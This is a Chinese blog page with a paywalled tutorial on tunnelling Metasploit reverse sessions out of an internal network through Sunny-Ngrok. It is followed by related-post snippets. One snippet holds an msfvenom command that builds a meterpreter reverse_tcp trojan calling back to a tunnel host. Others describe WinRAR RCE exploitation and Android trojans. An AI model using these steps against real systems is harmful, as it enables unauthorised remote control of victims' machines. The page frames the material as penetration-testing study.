MSF配合Ngrock穿透内网

最新推荐文章于 2024-07-26 18:52:15 发布
原创 最新推荐文章于 2024-07-26 18:52:15 发布 · 1k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍如何使用Ngrok实现内网穿透,包括搭建Ngrok服务器、生成与监听MSF payload,以及靶机运行payload建立回连会话的全过程。实验在免费版环境下进行,虽存在连接不稳定的问题,但成功展示了内网渗透测试的基本步骤。

当被攻击目标在内网无法与本地直接建立会话时,需要公网地址监听并转发会话。此时解决办法有:

1.msf安装在公网上;
2.使用公网进行转发 。

Ngrok 是一个反向代理,通过在公共的端口和本地运行的 Web 服务器之间建立一个安全的通道。可捕获和分析所有通道上的流量,便于后期分析和重放。它是内网穿透的跳板。

一、搭建ngrock服务器

官网:https://ngrok.cc/

在官网注册账号,这里实验使用免费版。注意:免费版可能无法加载会话,为我这种穷b准备的。
在这里插入图片描述
设置监听端口:
在这里插入图片描述
复制隧道id。选择版本进行客户端下载:
在这里插入图片描述
在这里插入图片描述
下载完成。在kali里直接运行:

./sunny clientid b86088bd6xxxxxx

后面这一串是购买时ngrock附送的隧道id;ngrock客户端与服务器建立连接,不要关闭这个窗口。

最低0.47元/天 解锁文章
使用PHP有效负载(msf)和ngrok进行黑客攻击 (ABPET)
我不是猫叔
09-11 765
使用PHP有效负载和ngrok 进行黑客攻击 我们将使用PHP有效负载进行黑客攻击,在本教程中我们将使用msfvenom(其实就是MSF)。 Msfvenom包含在kali linux操作系统中 工具准备阶段 步骤1:安装ngrok 请按照说明书安装ngrok。 让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download. 一旦ngrok完成下载,...
metasploit学习--联合Ngrok内网穿透生成木马远控主机
Delity的博客
04-27 1714
一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机 1.链接隧道 ./sunny clientid 隧道id 2.生成木马 msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell...
Ngrok内网穿透配合msf木马
sky
06-18 4314
Ngrok内网穿透配合msf木马   1. Ngrok的安装 原文地址:http://www.ggsec.cn/ Ngrok的下载地址:https://ngrok.com/download 下载对应版本并注册帐号 解压后将其放入 /bin/ ngrok  authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)   2.tc
通过ngrok内网捕获meterpreter反弹
hambaga的博客
09-13 1652
一、准备工作 在学习msf的过程中,一般都是搭建虚拟机,在局域网里进行练习的。在实际渗透中,目标机器与我们的主机可能并不在同一个网络内,甚至会有双方都处在内网中的情况。那么,如何让处在内网中的目标机器把 meterpreter shell 反弹到同样在内网中的主机呢? 首先需要一台有公网ip的服务器,用作中转。然后在服务器上部署ngrok服务,并生成linux平台的客户端程序。我选择的是自己搭...
WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线
欢迎来到神林的博客
03-11 807
前言 Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞,被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件,该文件自 2005 年发布至今就从未有过更新过,影响时长长达十余年之久。本篇文章鄙人会使用图文+视频的教程来给各位不知道利用的小粉们讲一下,视频教程在文末尾处。 漏洞细节: https://r...
MSF内网穿透
qq_47077502的博客
04-11 384
内网穿透msf
MSF+FRP实现内网穿透进行远控
dogeable的博客
01-30 3085
MSF+FRP实现内网穿透进行远控
MSF+内网穿透 实现远控
热门推荐
yxngu
05-09 1万+
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 8708
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2548
内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
4、内网安全-隧道&内网穿透上线&Ngrok&FRP&NPS&SPP&EW项目
m0_65842464的博客
01-06 1552
内网主机通过隧道与外网主机建立连接,隧道通过配置可以将访问外网主机的流量转发给内网主机,从而实现本地Kali虚拟机控制别人电脑上线
内网渗透之ngrok隧道
shy的博客
09-24 3812
场景:拿到了一个shell,管理员权限,windows系统,手动开启了3389端口,nmap扫描3389端口为filter,怀疑是防火墙拦截了,经过与度娘多次深入浅出的交流,决定使用ngrock隧道,将该服务器3389端口映射到公网上,然后进行远程登陆。 1,访问ngrok官网http://www.ngrok.cc/注册账号 2,购买这个美国的,免费的,特别容易出问题的免费隧道 3,开通隧道 http/https协议需要有自己的域名,名称随便写,远程端口也随便写,能用就行 最关键的是本地端口.
内网渗透—内网穿透工具&Ngrok&FRP&NPS&SPP
2301_76227305的博客
07-26 2440
这个实验我没有做成功,老是遇到一些奇奇怪怪的问题,烦死了。如若有师傅了解,还恳请指点一二,有偿答谢。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
最全ngrok实现内网穿透详细教程(windows )
qq_40595922的博客
10-21 3049
ngrok实现内网穿透详细教程(windows )
ngrock内网穿透Ngrok 和 Sunny-Ngrok
weixin_43229729的博客
03-23 1万+
由于最近做支付功能,支付宝访问的回调接口必须是外网可以访问的,而目前在开发阶段,没有部署到正式环境(公司的域名为正式环境的)。所以在开发测试时需要用到ngrok,将自己电脑ip暴露在外网上。 什么是内网穿透内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。简单来说,就是让身处局域网的电脑,被大家都能访问的技术。 Ngro...
ngrok.cc的使用(新版)
不积跬步无以至千里
06-16 6981
首先注册ngrok.cc账号(我这里已经注册了)   然后开通隧道   这里选择免费的   填写相关信息 开通成功后如下图 再去官网下载对应版本的客户端(Windows) 地址为:https://ngrok.cc/   将压缩包解压出来,这里注意了直接双击exe是会出现如下图提示的   这时我们需要通过cmd命令来执行如下的命令(命令执行前我这里启动了一个...
msf安卓手机木马实战要点整理
Vdieoo的博客
04-07 5920
Msf手机木马高级选项设置说明 Androidwakelock 阻止手机休眠以便处理耗时操作 AutoUnhookProcess ? AutoVerifySession 自动验证删除无效会话 AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内 EnableStageEncoding 对第二级有效载荷进行编码 Sessi...
利用msf进行端口转发
Bul1et的博客
06-20 2386
有时候爆破得到服务弱口令本机却连接不上,此时我们就需要用到端口转发 左侧的图是msf进行端口转发 右侧重新打开一个终端 去连接转发到本地的端口 -u用户名 -p密码 ...
MSF课堂笔记
qq_33040633的博客
10-17 3688
msf
msf内网穿透远控
最新发布
11-09
以下是使用Metasploit Framework(MSF)实现内网穿透和远程控制的技术方案,结合核心步骤和关键要点: --- ### **一、内网穿透技术原理** 1. **穿透逻辑** 攻击机(公网) → 边界主机(被控内网设备) → 目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值